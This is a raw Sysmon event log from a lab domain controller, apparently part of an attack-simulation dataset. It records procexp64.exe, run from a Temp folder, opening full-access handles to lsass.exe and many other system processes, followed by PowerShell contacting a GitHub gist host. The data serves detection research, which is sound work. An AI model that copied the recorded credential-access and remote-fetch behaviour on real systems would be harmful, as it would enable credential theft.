15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792106Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792105Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792104Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792103Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792102Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792101Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792100Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792099Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792098Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792097Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792096Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792095Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792094Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792093Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792092Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792091Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792090Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792089Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792088Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792087Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792086Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792085Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792084Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792083Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792082Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792081Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792080Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792079Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792078Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792077Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792076Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792075Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792074Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792073Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792072Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792071Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:59.813{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000792070Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.323{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-770.attackrange.local59751-false151.101.52.133-443https 22542200x8000000000000000792069Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.313{732C744F-3267-6010-DFA2-00000000A301}5236gist.githubusercontent.com0type: 5 github.map.fastly.net;::ffff:151.101.52.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x8000000000000000792223Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 